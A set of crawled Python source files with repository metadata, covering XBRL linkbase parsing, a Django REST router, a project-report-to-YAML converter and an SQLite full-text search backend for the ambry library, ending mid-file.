        self.closed: bool or None = closed
        self.context_element: bool or None = context_element

    def __str__(self) -> str:
        role_tail = self.arcrole.split('/')[-1]
        return "Linking to {} as {}".format(str(self.to_locator.name), role_tail)

    def to_dict(self) -> dict:
        """Return a dictionary representation of the arc."""
        result = {
            "arcrole": self.arcrole,
            "order": self.order,
            "closed": self.closed,
            "contextElement": self.context_element,
            "locator": self.to_locator.to_dict(),
        }
        return result
class CalculationArc(RelationArc):
    """A link:calculationArc; always uses the summation-item arcrole."""

    def __init__(self, from_locator, to_locator, order: int, weight: float) -> None:
        """
        @type from_locator: Locator
        @type to_locator: Locator
        @param weight: sign and multiplication factor relating the two
            connected concepts (XBRL for Interactive Data, 2009, p.61)
        """
        # Calculation arcs have exactly one possible arc role.
        arcrole = "http://www.xbrl.org/2003/arcrole/summation-item"
        super().__init__(from_locator, to_locator, arcrole, order)
        self.weight: float = weight

    def to_dict(self):
        """Return a dictionary representation of the arc."""
        return {
            "arcrole": self.arcrole,
            "order": self.order,
            "weight": self.weight,
            "locator": self.to_locator.to_dict(),
        }

    def __str__(self) -> str:
        return "{} {}".format(self.arcrole.split('/')[-1], self.to_locator.concept_id)
class PresentationArc(RelationArc):
    """A link:presentationArc; always uses the parent-child arcrole."""

    def __init__(self, from_locator, to_locator, order: int, priority: int, preferred_label: str = None) -> None:
        """
        @type from_locator: Locator
        @type to_locator: Locator
        @param priority: priority attribute of the arc
        @param preferred_label: most appropriate kind of label to use when
            presenting the arc's child Concept (XBRL Specification 2.1, 5.2.4.2.1)
        """
        # Presentation arcs have exactly one possible arc role.
        arcrole = "http://www.xbrl.org/2003/arcrole/parent-child"
        super().__init__(from_locator, to_locator, arcrole, order)
        self.priority = priority
        self.preferred_label: str = preferred_label

    def to_dict(self):
        """Return a dictionary representation of the arc.

        NOTE(review): priority is not included in the output — confirm
        whether consumers expect it here.
        """
        return {
            "arcrole": self.arcrole,
            "order": self.order,
            "preferredLabel": self.preferred_label,
            "locator": self.to_locator.to_dict(),
        }

    def __str__(self) -> str:
        return "{} {}".format(self.arcrole.split('/')[-1], self.to_locator.concept_id)
class Label:
    """A link:label resource of a label linkbase.

    Only LabelArcs make use of this class.

    Example::

        <link:label id="lab_Assets_label_en-US" xlink:label="lab_Assets"
            xlink:role="http://www.xbrl.org/2003/role/label"
            xlink:type="resource" xml:lang="en-US">Assets</link:label>
    """

    def __init__(self, label: str, label_type: str, language: str, text: str) -> None:
        """
        @param label: the xlink:label of the label; locators reference the
            label through this value (e.g. ``lab_Assets``)
        @param label_type: role of the label
            (XBRL for Interactive Data, 2009, p.61), one of:
            - http://www.xbrl.org/2003/role/label: standard label
            - http://www.xbrl.org/2003/role/terseLabel: short label, often
              omitting text inferable from related concepts
            - http://www.xbrl.org/2003/role/verboseLabel: extended label
              understandable on a standalone basis
            - http://www.xbrl.org/2003/role/totalLabel: label used when the
              concept is reported as the total of a set of other values
            - http://www.xbrl.org/2003/role/periodStartLabel /
              http://www.xbrl.org/2003/role/periodEndLabel: labels for an
              instant concept reported as start (end) of period value
            - http://www.xbrl.org/2003/role/documentation: documentation of
              the concept's meaning and appropriate usage
        @param language: xml:lang of the label
        @param text: the label text itself; surrounding whitespace is stripped
        """
        self.label: str = label
        self.language = language
        # keep None as-is, otherwise normalise surrounding whitespace
        self.text: str = text if text is None else text.strip()
        self.label_type: str = label_type

    def __str__(self) -> str:
        return self.text
class LabelArc(AbstractArcElement):
    """A link:labelArc.

    Its XML form carries an xlink:to attribute just like the relational
    arcs, but instead of resolving to a single locator (1:1) it resolves
    to one or more link:label resources.
    """

    def __init__(self, from_locator, order: int, labels: List[Label]) -> None:
        """
        @type from_locator: Locator
        @param labels: the Label objects this arc points to
        @type labels: Label[]
        """
        # Label arcs have exactly one possible arc role.
        super().__init__(from_locator, "http://www.xbrl.org/2003/arcrole/concept-label", order)
        self.labels = labels

    def __str__(self) -> str:
        return "LabelArc with {} labels".format(len(self.labels))

    def to_dict(self) -> dict:
        """Return a mapping of label role -> label text for every label."""
        return {label.label_type: label.text for label in self.labels}
class Locator:
    """Points from a linkbase entry back to a concept in the schema file.

    Example::

        <link:loc xlink:href="../elts/us-gaap-2019-01-31.xsd#us-gaap_Goodwill"
            xlink:label="loc_Goodwill" xlink:type="locator"/>
    """

    def __init__(self, href: str, name: str):
        """
        @param href: link the locator points to, IN ABSOLUTE FORMAT
            (starting with http...)
        @param name: the xlink:label of the locator (e.g. loc_Goodwill)
        """
        # link to the concept (e.g. .../us-gaap-2019-01-31.xsd#us-gaap_Goodwill)
        self.href: str = href
        self.name: str = name
        # concept id is the fragment after '#' (e.g. us-gaap_Goodwill)
        self.concept_id: str = href.split('#')[1]
        # locators that point at this one via an arc's "to" attribute; used
        # only to detect root locators (those without parents)
        self.parents: List[Locator] = []
        # arcs that reference this locator in their "from" attribute
        self.children: List[AbstractArcElement] = []

    def __str__(self) -> str:
        return "{} with {} children".format(self.name, len(self.children))

    def to_dict(self) -> dict:
        """Recursive dictionary built from the children (parents ignored)."""
        child_dicts = [arc.to_dict() for arc in self.children]
        return {"name": self.name, "href": self.href,
                "concept_id": self.concept_id, "children": child_dicts}

    def to_simple_dict(self) -> dict:
        """Like to_dict() but without arc information: hierarchy only."""
        child_dicts = [arc.to_locator.to_simple_dict() for arc in self.children]
        return {"concept_id": self.concept_id, "children": child_dicts}
class ExtendedLink:
    """Generic container for the standard extended link elements.

    Per the XBRL 2.0 specification this covers link:presentationLink,
    link:calculationLink, link:labelLink, link:referenceLink and
    link:definitionLink.
    """

    def __init__(self, role: str, elr_id: str or None, root_locators: List[Locator]) -> None:
        """
        @param role: role of the extended link element
        @param elr_id: reference to the extended link role declared in the
            schema file (e.g. aapl-20180929.xsd#ConsolidatedStatements...);
            None for label linkbases!
        @param root_locators: all locators without parents
        """
        self.role: str = role
        self.elr_id: str or None = elr_id
        self.root_locators: List[Locator] = root_locators

    def to_dict(self) -> dict:
        """Full dictionary representation including arc information."""
        return {"role": self.role, "elr_id": self.elr_id,
                "root_locators": [locator.to_dict() for locator in self.root_locators]}

    def to_simple_dict(self) -> dict:
        """Hierarchy-only representation (arc information omitted)."""
        return {"role": self.role,
                "children": [locator.to_simple_dict() for locator in self.root_locators]}

    def __str__(self) -> str:
        return self.elr_id
class Linkbase:
    """A complete (non-generic) linkbase."""

    def __init__(self, extended_links: List[ExtendedLink], linkbase_type: LinkbaseType, linkbase_uri: None or str = None) -> None:
        """
        :param extended_links: all standard extended links defined in the linkbase
        :type extended_links: [ExtendedDefinitionLink] or [ExtendedCalculationLink] or [ExtendedPresentationLink] or [ExtendedLabelArc]
        :param linkbase_type: type of the linkbase
        :param linkbase_uri: path or url of the linkbase (depends on where the
            parser loaded it from)
        """
        self.extended_links: List[ExtendedLink] = extended_links
        self.type = linkbase_type
        self.linkbase_uri = linkbase_uri

    def to_dict(self) -> dict:
        """Dictionary with the full locator hierarchy of every extended link."""
        elements = [link.to_dict() for link in self.extended_links]
        return {"standardExtendedLinkElements": elements}

    def to_simple_dict(self) -> dict:
        """Like to_dict() but without arc information (hierarchy only)."""
        elements = [link.to_simple_dict() for link in self.extended_links]
        return {"standardExtendedLinkElements": elements}
def parse_linkbase_url(linkbase_url: str, linkbase_type: LinkbaseType, cache: HttpCache) -> Linkbase:
    """Download a remote linkbase through the cache and parse it.

    :param linkbase_url: full link to the linkbase
    :param linkbase_type: type of the linkbase (calculation-, label-, presentation-, ...)
    :param cache: :class:`xbrl.cache.HttpCache` instance
    :return: parsed :class:`xbrl.linkbase.Linkbase` object
    """
    if not linkbase_url.startswith('http'):
        raise XbrlParseException(
            'This function only parses remotely saved linkbases. Please use parse_linkbase to parse local linkbases')
    cached_path: str = cache.cache_file(linkbase_url)
    return parse_linkbase(cached_path, linkbase_type, linkbase_url)
def parse_linkbase(linkbase_path: str, linkbase_type: LinkbaseType, linkbase_url: str or None = None) -> Linkbase:
    """
    Parses a linkbase and returns a Linkbase object containing all
    locators, arcs and links of the linkbase in a hierarchical order (a Tree).
    A Linkbase usually does not import any additional files,
    thus no cache instance is needed.

    :param linkbase_path: path to the linkbase
    :param linkbase_type: Type of the linkbase
    :param linkbase_url: if the locators of the linkbase contain relative references to concepts
        (i.e.: './../schema.xsd#Assets') the url has to be set so that the parser can connect
        the locator with the concept from the taxonomy
    :return: parsed :class:`xbrl.linkbase.Linkbase` object
    :raises XbrlParseException: if a remote url was passed instead of a local path
    :raises LinkbaseNotFoundException: if no file exists at linkbase_path
    """
    if linkbase_path.startswith('http'):
        raise XbrlParseException(
            'This function only parses locally saved linkbases. Please use parse_linkbase_url to parse remote linkbases')
    if not os.path.exists(linkbase_path):
        raise LinkbaseNotFoundException(f"Could not find linkbase at {linkbase_path}")

    root: ET.Element = ET.parse(linkbase_path).getroot()

    # Role Refs are xlink's that connect the extended links to the ELR defined
    # in the schema; store them with the role uri as key for O(1) lookup.
    role_refs: dict = {}
    for role_ref in root.findall(LINK_NS + 'roleRef'):
        role_refs[role_ref.attrib['roleURI']] = role_ref.attrib[XLINK_NS + 'href']

    # Each extended link contains the locators and the arcs of one role.
    extended_links: List[ExtendedLink] = []

    # Figure out if we search for definitionLink, calculationLink,
    # presentationLink or labelLink, and for the matching arc element.
    extended_link_tag: str
    arc_type: str
    if linkbase_type == LinkbaseType.DEFINITION:
        extended_link_tag = "definitionLink"
        arc_type = "definitionArc"
    elif linkbase_type == LinkbaseType.CALCULATION:
        extended_link_tag = "calculationLink"
        arc_type = "calculationArc"
    elif linkbase_type == LinkbaseType.PRESENTATION:
        extended_link_tag = "presentationLink"
        arc_type = "presentationArc"
    else:
        extended_link_tag = "labelLink"
        arc_type = "labelArc"

    # Loop over all extended links (link:definitionLink, link:calculationLink, ...).
    # Note that label linkbases only have one extended link.
    for extended_link in root.findall(LINK_NS + extended_link_tag):
        extended_link_role: str = extended_link.attrib[XLINK_NS + 'role']
        # find all locators (link:loc) and arcs (i.e link:definitionArc or link:calculationArc)
        locators = extended_link.findall(LINK_NS + 'loc')
        arc_elements = extended_link.findall(LINK_NS + arc_type)

        # Store the locators in a dictionary keyed by the label attribute so
        # arcs can resolve their endpoints in O(1).
        locator_map = {}
        for loc in locators:
            loc_label: str = loc.attrib[XLINK_NS + 'label']
            # resolve relative locator hrefs against the linkbase location
            locator_href = loc.attrib[XLINK_NS + 'href']
            if not locator_href.startswith('http'):
                # todo, try to get the URL here, instead of the path!!!
                locator_href = resolve_uri(linkbase_url if linkbase_url else linkbase_path, locator_href)
            locator_map[loc_label] = Locator(locator_href, loc_label)

        # Performance: extract the labels in advance. The label name
        # (xlink:label) is the key and the value is the list of all labels
        # with this name (label, terseLabel, documentation, ...).
        label_map = {}
        if linkbase_type == LinkbaseType.LABEL:
            for label_element in extended_link.findall(LINK_NS + 'label'):
                label_name: str = label_element.attrib[XLINK_NS + 'label']
                label_role: str = label_element.attrib[XLINK_NS + 'role']
                label_lang: str = label_element.attrib[XML_NS + 'lang']
                label_obj = Label(label_name, label_role, label_lang, label_element.text)
                label_map.setdefault(label_name, []).append(label_obj)

        for arc_element in arc_elements:
            # if the use of the element referenced by the arc is prohibited, just ignore it
            if 'use' in arc_element.attrib and arc_element.attrib['use'] == 'prohibited':
                continue
            # An arc always connects two locators through the from and to
            # attributes and defines their relationship (arcrole).
            arc_from: str = arc_element.attrib[XLINK_NS + 'from']
            arc_to: str = arc_element.attrib[XLINK_NS + 'to']
            arc_role: str = arc_element.attrib[XLINK_NS + 'arcrole']
            # NOTE: kept as the raw attribute string, as before
            arc_order: int = arc_element.attrib['order'] if 'order' in arc_element.attrib else None

            # The following attributes are linkbase specific, so check existence.
            # Needed for (sometimes) definitionArc.
            # (Bug fix: the original tested for the xbrldt:weight attribute
            # before reading xbrldt:closed, and bool() of the attribute string
            # was True even for "false". Test the correct key and parse the
            # xs:boolean lexical values explicitly.)
            arc_closed: bool = (arc_element.attrib[XBRLDT_NS + "closed"] in ('true', '1')) \
                if (XBRLDT_NS + "closed") in arc_element.attrib else None
            arc_context_element: str = arc_element.attrib[XBRLDT_NS + "contextElement"] if \
                (XBRLDT_NS + "contextElement") in arc_element.attrib else None
            # Needed for calculationArc
            arc_weight: float = float(arc_element.attrib["weight"]) if "weight" in arc_element.attrib else None
            # Needed for presentationArc
            arc_priority: int = int(arc_element.attrib["priority"]) if "priority" in arc_element.attrib else None
            arc_preferred_label: str = arc_element.attrib[
                "preferredLabel"] if "preferredLabel" in arc_element.attrib else None

            # Create the arc object based on the current linkbase type.
            arc_object: AbstractArcElement
            if linkbase_type == LinkbaseType.DEFINITION:
                arc_object = DefinitionArc(
                    locator_map[arc_from], locator_map[arc_to], arc_role, arc_order, arc_closed,
                    arc_context_element)
            elif linkbase_type == LinkbaseType.CALCULATION:
                arc_object = CalculationArc(locator_map[arc_from], locator_map[arc_to], arc_order, arc_weight)
            elif linkbase_type == LinkbaseType.PRESENTATION:
                arc_object = PresentationArc(locator_map[arc_from], locator_map[arc_to], arc_order, arc_priority,
                                             arc_preferred_label)
            else:
                # label arcs reference link:label resources which were
                # preprocessed into label_map above
                arc_object = LabelArc(locator_map[arc_from], arc_order, label_map[arc_to])

            # Build the hierarchy for the locators. This does not work for
            # label linkbases, since link:labelArcs only link to link:labels
            # and not to other locators!
            if linkbase_type != LinkbaseType.LABEL:
                locator_map[arc_to].parents.append(locator_map[arc_from])
            locator_map[arc_from].children.append(arc_object)

        # Find the top elements of the tree (all locators without parents).
        root_locators = []
        for locator in locator_map.values():
            if len(locator.parents) == 0:
                root_locators.append(locator)

        # Only add the extended link to the linkbase if the link references a role
        # (some filers have empty links in which we are not interested:
        # <definitionLink xlink:type="extended" xlink:role="http://www.xbrl.org/2003/role/link"/>)
        if extended_link_role in role_refs:
            extended_links.append(
                ExtendedLink(extended_link_role, role_refs[extended_link_role], root_locators))
        elif linkbase_type == LinkbaseType.LABEL:
            extended_links.append(ExtendedLink(extended_link_role, None, root_locators))
    return Linkbase(extended_links, linkbase_type, linkbase_url if linkbase_url else linkbase_path)
| manusimidt/py-xbrl | xbrl/linkbase.py | linkbase.py | py | 27,220 | python | en | code | 78 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "abc.ABC",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "abc.ABC",
"line_number"... |
74816953384 | from django.urls import include, path
from rest_framework import routers
from . import views
# The DefaultRouter generates the views from our viewsets and creates the
# URL paths for them. (Translated from Polish.)
router = routers.DefaultRouter()
router.register('categories', views.CategoryViewSet)
router.register('rooms', views.RoomViewSet)
router.register('plants', views.PlantViewSet)
# Mount every router-generated route at the application root.
urlpatterns = [
path('', include(router.urls)),
]
| BParaszczak/plant_manager | plants/urls.py | urls.py | py | 413 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "rest_framework.routers",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
"line_number": 12,
"usage_type": "call"
},
{
"api_na... |
15972612873 | #!/usr/bin/env python3
__doc__ = """Process a dump from the 'Charge Activity Report by Employee
- Project Detail Information' report from Webwise. We only need the
table view because we simply want to extract the fields. For this to
work, we _must_ have the table headers. Those are used as the keys in
the YAML formatting.
"""
import argparse
import datetime
import os
import re
import yaml
# str.format template for one project entry in the emitted YAML. Placeholders
# are the column headers of the input table (e.g. {Project Title}); dotted
# fields such as {Contract Start Date.year} read attributes of the parsed
# datetime values built in the __main__ block below. Bracketed '[...]' values
# are fill-in-by-hand prompts left for the report author.
_reference_format = """ - title: {Project Title}
project: {Project}
contract: {Contract No}
sponsor: {Sponsor}
PD:
project: {PD of Project}
subtask: {PD of Subtask}
role: '[Program manager, P.D./P.I., Co-P.I./P.D. Task leader]'
budget: '[Did Candidate have budgetary authority?]'
subtask: {Subtask Title}
amount-funded:
task: {Budget of Subtask}
project: {Funded Amount includes Fee}
number-supervised: '[15 (3 PRE, 1 SRE, 1 REII, 1 RE1, 9 students)]'
performance:
project:
- year: {Contract Start Date.year}
month: {Contract Start Date.month}
day: {Contract Start Date.day}
- year: {Contract End Date.year}
month: {Contract End Date.month}
day: {Contract End Date.day}
candidate:
- year: {Employee First Month Worked on Project.year}
month: {Employee First Month Worked on Project.month}
day: {Employee First Month Worked on Project.day}
- year: {Employee Last Month Worked on Project.year}
month: {Employee Last Month Worked on Project.month}
day: {Employee Last Month Worked on Project.day}
hours-worked: {Total Hours Worked}
contributions: '[Briefly describe you contributions in 2--3 sentences.]'
"""
# These were part of an attempt to update a reference YAML with new
# information from the table, but I think that's going to take too much
# effort. Maybe we'll do that, but not now.
# _empty_row = {
# "title" : "",
# "project" : "",
# "contract" : "",
# "sponsor" : "",
# "PD-project" : "",
# "PD-subtask" : "",
# "role" : "'[Program manager, P.D./P.I., Co-P.I./P.D. Task leader]'",
# "budget" : "'[Did Candidate have budgetary authority?]'",
# "subtask" : "",
# "amount-funded-task" : "",
# "amount-funded-project" : "",
# "number-supervised" : "'[15 (3 PRE, 1 SRE, 1 REII, 1 RE1, 9 students)]'",
# "contract-start" : None,
# "contract-end" : None,
# "candidate-start" : None,
# "candidate-end" : None,
# "hour-worked" : "",
# "contributions" : "'[Briefly describe you contributions in 2--3 sentences.]'",
# }
# _from_to_keys = (
# ("Project Title", "title"),
# ("Project", "project"),
# ("Contract No", "contract"),
# ("Sponsor", "sponsor"),
# ("PD of Project", "pd-project"),
# ("PD of Subtask", "pd-subtask"),
# ("Subtask Title", "subtask"),
# ("Budget of Subtask", "amount-funded-task"),
# ("Funded Amount includes Fee", "amount-funded-project"),
# ("Contract Start Date", "contract-start"),
# ("Contract End Date", "contract-end"),
# ("Employee First Month Worked on Project", "candidate-start"),
# ("Employee Last Month Worked on Project", "candidate-end"),
# ("Total Hours Worked", "hour-worked"),
# )
# This is the worked out regular expression for copying the vita
# view over. All of the information is in the table and it's easier
# to parse that. But I don't want to loose the careful work I did
# to figure this out.
# pattern = re.compile(r"\s*\d+\s*" \
# + r"Project\s*Title\s*(?P<title>[-&\w\s]+)" \
# + r"Contract\s*No(?:[.]|umber)\s*(?P<contract>[\w-]*)\s*" \
# + r"Sponsor\s*(?P<sponsor>[-&\w/\s]+)\s*" \
# + r"P[.]\s*I[.]\s*(?P<pi>[\w,\s]+)" \
# + r"Candidate['’]s\s+Role\s*(?P<role>[\w\s-]*)" \
# + r"Budgetary\s*Authority[?]\s*(?P<budget>\w*)\s*" \
# + r"Subtask\s*Title[?]?\s*(?P<subtask>[-&\w\s]*)" \
# + r"Amount\s*Funded\s*for\s*Task:?\s*(?P<task_amount>\$[\d,.]+)?\s*" \
# + r"Amount\s*Funded\s*for\s*Project:?\s*(?P<project_amount>\$[\d,.]+)?\s*" \
# + r"Number\s*and\s*Rank\s*of\s*Persons\s*Supervised:?\s*(?P<supervised>[\w\s]*)" \
# + r"Period\s*of\s*Performance\s*\(Project\):?\s*(?P<project_performance>[-/\d\s]*)" \
# + r"Period\s*of\s*Performance\s*\(Candidate\):?\s*(?P<candidate_performance>[-/\d\s]*)" \
# + r"Contributions:?\s*(?P<contributions>\w|\s)*"
# )
# We define two entries as the same if they have the same entries
# same_entry = lambda l, r: all(l[k] == r[k] for k in ("title",
# "subtask",
# "contract"))
if __name__ == "__main__":
prog, _ = os.path.splitext(".".join(__file__.split(os.sep)[-3:]))
parser = argparse.ArgumentParser(prog=prog, description=__doc__)
parser.add_argument("-o", "--output", default="-",
type=argparse.FileType("w"),
help="Output file")
parser.add_argument("table", type=argparse.FileType("r"),
help="Input table view")
args = parser.parse_args()
keys = [k.strip() for k in args.table.readline().split("\t")]
# Sanitize the bad lines that start with a tab. This is most likely
# due to the poor formatting or bad copy/paste.
lines = []
for line in args.table.readlines():
if line.startswith("\t") and len(lines) > 0:
lines[-1] = lines[-1][:-len(os.linesep)] + line
else:
lines.append(line)
func = lambda k, x: datetime.datetime.strptime(x, "%m/%d/%Y") \
if k in keys[-4:] else x
args.output.write("projects:\n")
for line in lines:
row = {k:func(k, e.strip())
for k, e in zip(keys, line.split("\t"))}
args.output.write(_reference_format.format(**row))
| kprussing/resume | projects-import.py | projects-import.py | py | 6,217 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 116,
"usage_type": "attribute"
},
{
"api_name": "os.sep",
"line_number": 116,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser"... |
37738312088 | # -*- coding: utf-8 -*-
from collections import defaultdict
import struct
from sqlalchemy.sql.expression import text
from ambry.orm.dataset import Dataset
from ambry.library.search_backends.base import BaseDatasetIndex, BasePartitionIndex,\
BaseIdentifierIndex, BaseSearchBackend, IdentifierSearchResult,\
DatasetSearchResult, PartitionSearchResult, SearchTermParser
from ambry.util import get_logger
import logging
logger = get_logger(__name__, propagate=False)
#logger.setLevel(logging.DEBUG)
class SQLiteSearchBackend(BaseSearchBackend):
    """Search backend built on SQLite FTS virtual tables."""

    def _get_dataset_index(self):
        """ Returns dataset index. """
        return DatasetSQLiteIndex(backend=self)

    def _get_partition_index(self):
        """ Returns partition index. """
        return PartitionSQLiteIndex(backend=self)

    def _get_identifier_index(self):
        """ Returns identifier index. """
        return IdentifierSQLiteIndex(backend=self)

    def _and_join(self, terms):
        """ AND join of the terms (whitespace is an implicit AND in FTS).

        Args:
            terms (list):

        Examples:
            self._and_join(['term1', 'term2'])

        Returns:
            str
        """
        if len(terms) <= 1:
            return self._or_join(terms[0])
        return ' '.join(self._or_join(term) for term in terms)
class DatasetSQLiteIndex(BaseDatasetIndex):
    """ Dataset index backed by an SQLite FTS3 virtual table. """

    def __init__(self, backend=None):
        assert backend is not None, 'backend argument can not be None.'
        # Use the explicit class in super() so a subclass does not recurse
        # (super(self.__class__, ...) is unsafe under inheritance).
        super(DatasetSQLiteIndex, self).__init__(backend=backend)
        logger.debug('Creating dataset FTS table.')
        query = """\
            CREATE VIRTUAL TABLE IF NOT EXISTS dataset_index USING fts3(
                vid VARCHAR(256) NOT NULL,
                title TEXT,
                keywords TEXT,
                doc TEXT
            );
        """
        self.backend.library.database.connection.execute(query)

    def _make_query_from_terms(self, terms):
        """ Creates a query for dataset from decomposed search terms.

        Args:
            terms (dict or unicode or string):

        Returns:
            tuple of (str, dict): First element is str with FTS query, second is parameters
                of the query.
        """
        match_query = ''

        expanded_terms = self._expand_terms(terms)
        if expanded_terms['doc']:
            match_query = self.backend._or_join(expanded_terms['doc'])

        if expanded_terms['keywords']:
            keyword_query = self.backend._join_keywords(expanded_terms['keywords'])
            if match_query:
                # Adjacent sub-queries in an FTS MATCH expression are
                # implicitly AND-ed, so a space combines both conditions.
                # (Bug fix: the original called self.backend._and_join with
                # two positional arguments, but _and_join takes a single list
                # of terms, raising TypeError whenever a phrase contained
                # both doc terms and keywords.)
                match_query = '{} {}'.format(match_query, keyword_query)
            else:
                match_query = keyword_query

        query = text("""
            SELECT vid, rank(matchinfo(dataset_index)) AS score
            FROM dataset_index
            WHERE dataset_index MATCH :match_query
            ORDER BY score DESC;
        """)

        query_params = {
            'match_query': match_query}
        return query, query_params

    def search(self, search_phrase, limit=None):
        """ Finds datasets by search phrase.

        Args:
            search_phrase (str or unicode):
            limit (int, optional): how many results to return. None means without limit.

        Returns:
            list of DatasetSearchResult instances.
        """
        # SQLite FTS can't find terms with `-`, therefore all hyphens were replaced with
        # underscore before save (see _as_document); apply the same mapping to the query.
        # See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
        search_phrase = search_phrase.replace('-', '_')
        query, query_params = self._make_query_from_terms(search_phrase)
        self._parsed_query = (query, query_params)
        connection = self.backend.library.database.connection

        # Register the rank() SQL function on the raw DBAPI connection.
        connection.connection.create_function('rank', 1, _make_rank_func((1., .1, 0, 0)))

        logger.debug('Searching datasets using `{}` query.'.format(query))
        results = connection.execute(query, **query_params).fetchall()

        datasets = defaultdict(DatasetSearchResult)
        for result in results:
            vid, score = result
            datasets[vid] = DatasetSearchResult()
            datasets[vid].vid = vid
            datasets[vid].b_score = score

        # Fold matching partitions into their datasets' partition score.
        logger.debug('Extending datasets with partitions.')
        for partition in self.backend.partition_index.search(search_phrase):
            datasets[partition.dataset_vid].p_score += partition.score
            datasets[partition.dataset_vid].partitions.add(partition)
        return list(datasets.values())

    def list_documents(self, limit=None):
        """ Generates vids of all indexed datasets.

        Args:
            limit (int, optional): If not empty, the maximum number of results to return

        Generates:
            str: vid of the dataset.
        """
        limit_str = ''
        if limit:
            try:
                limit_str = 'LIMIT {}'.format(int(limit))
            except (TypeError, ValueError):
                # silently ignore an invalid limit and return everything
                pass
        query = ('SELECT vid FROM dataset_index ' + limit_str)
        for row in self.backend.library.database.connection.execute(query).fetchall():
            yield row['vid']

    def _as_document(self, dataset):
        """ Converts dataset to document indexed by to FTS index.

        Args:
            dataset (orm.Dataset): dataset to convert.

        Returns:
            dict with structure matches to BaseDatasetIndex._schema.
        """
        assert isinstance(dataset, Dataset)
        doc = super(DatasetSQLiteIndex, self)._as_document(dataset)

        # SQLite FTS can't find terms with `-`, replace it with underscore here
        # and while searching.
        # See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
        doc['keywords'] = doc['keywords'].replace('-', '_')
        doc['doc'] = doc['doc'].replace('-', '_')
        doc['title'] = doc['title'].replace('-', '_')
        return doc

    def _index_document(self, document, force=False):
        """ Adds document to the index. """
        query = text("""
            INSERT INTO dataset_index(vid, title, keywords, doc)
            VALUES(:vid, :title, :keywords, :doc);
        """)
        self.backend.library.database.connection.execute(query, **document)

    def reset(self):
        """ Drops index table. """
        query = """
            DROP TABLE dataset_index;
        """
        self.backend.library.database.connection.execute(query)

    def _delete(self, vid=None):
        """ Deletes given dataset from index.

        Args:
            vid (str): dataset vid.
        """
        query = text("""
            DELETE FROM dataset_index
            WHERE vid = :vid;
        """)
        self.backend.library.database.connection.execute(query, vid=vid)

    def is_indexed(self, dataset):
        """ Returns True if dataset is already indexed. Otherwise returns False. """
        query = text("""
            SELECT vid
            FROM dataset_index
            WHERE vid = :vid;
        """)
        result = self.backend.library.database.connection.execute(query, vid=dataset.vid)
        return bool(result.fetchall())

    def all(self):
        """ Returns list with all indexed datasets. """
        datasets = []

        query = text("""
            SELECT vid
            FROM dataset_index;""")

        for result in self.backend.library.database.connection.execute(query):
            res = DatasetSearchResult()
            res.vid = result[0]
            res.b_score = 1
            datasets.append(res)
        return datasets
class IdentifierSQLiteIndex(BaseIdentifierIndex):
def __init__(self, backend=None):
assert backend is not None, 'backend argument can not be None.'
super(self.__class__, self).__init__(backend=backend)
logger.debug('Creating identifier FTS table.')
query = """\
CREATE VIRTUAL TABLE IF NOT EXISTS identifier_index USING fts3(
identifier VARCHAR(256) NOT NULL,
type VARCHAR(256) NOT NULL,
name TEXT
);
"""
self.backend.library.database.connection.execute(query)
def search(self, search_phrase, limit=None):
""" Finds identifiers by search phrase.
Args:
search_phrase (str or unicode):
limit (int, optional): how many results to return. None means without limit.
Returns:
list of IdentifierSearchResult instances.
"""
query_parts = [
'SELECT identifier, type, name, 0',
'FROM identifier_index',
'WHERE name MATCH :part']
query_params = {
'part': '*{}*'.format(search_phrase)}
query_parts.append('ORDER BY name')
if limit:
query_parts.append('LIMIT :limit')
query_params['limit'] = limit
query_parts.append(';')
query = text('\n'.join(query_parts))
results = self.backend.library.database.connection.execute(query, **query_params).fetchall()
for result in results:
vid, type, name, score = result
yield IdentifierSearchResult(
score=score, vid=vid,
type=type, name=name)
def list_documents(self, limit=None):
""" Generates vids of all indexed identifiers.
Args:
limit (int, optional): If not empty, the maximum number of results to return
Generates:
str: vid of the document.
"""
limit_str = ''
if limit:
try:
limit_str = 'LIMIT {}'.format(int(limit))
except (TypeError, ValueError):
pass
query = ('SELECT identifier FROM identifier_index ' + limit_str)
for row in self.backend.library.database.connection.execute(query).fetchall():
yield row['identifier']
def _index_document(self, identifier, force=False):
""" Adds identifier document to the index. """
query = text("""
INSERT INTO identifier_index(identifier, type, name)
VALUES(:identifier, :type, :name);
""")
self.backend.library.database.connection.execute(query, **identifier)
def reset(self):
""" Drops index table. """
query = """
DROP TABLE identifier_index;
"""
self.backend.library.database.connection.execute(query)
def _delete(self, identifier=None):
""" Deletes given identifier from index.
Args:
identifier (str): identifier of the document to delete.
"""
query = text("""
DELETE FROM identifier_index
WHERE identifier = :identifier;
""")
self.backend.library.database.connection.execute(query, identifier=identifier)
def is_indexed(self, identifier):
""" Returns True if identifier is already indexed. Otherwise returns False. """
query = text("""
SELECT identifier
FROM identifier_index
WHERE identifier = :identifier;
""")
result = self.backend.library.database.connection.execute(query, identifier=identifier['identifier'])
return bool(result.fetchall())
def all(self):
""" Returns list with all indexed identifiers. """
identifiers = []
query = text("""
SELECT identifier, type, name
FROM identifier_index;""")
for result in self.backend.library.database.connection.execute(query):
vid, type_, name = result
res = IdentifierSearchResult(
score=1, vid=vid, type=type_, name=name)
identifiers.append(res)
return identifiers
class PartitionSQLiteIndex(BasePartitionIndex):
def __init__(self, backend=None):
assert backend is not None, 'backend argument can not be None.'
super(self.__class__, self).__init__(backend=backend)
logger.debug('Creating partition FTS table.')
query = """\
CREATE VIRTUAL TABLE IF NOT EXISTS partition_index USING fts3(
vid VARCHAR(256) NOT NULL,
dataset_vid VARCHAR(256) NOT NULL,
from_year INTEGER,
to_year INTEGER,
title TEXT,
keywords TEXT,
doc TEXT
);
"""
self.backend.library.database.connection.execute(query)
def search(self, search_phrase, limit=None):
""" Finds partitions by search phrase.
Args:
search_phrase (str or unicode):
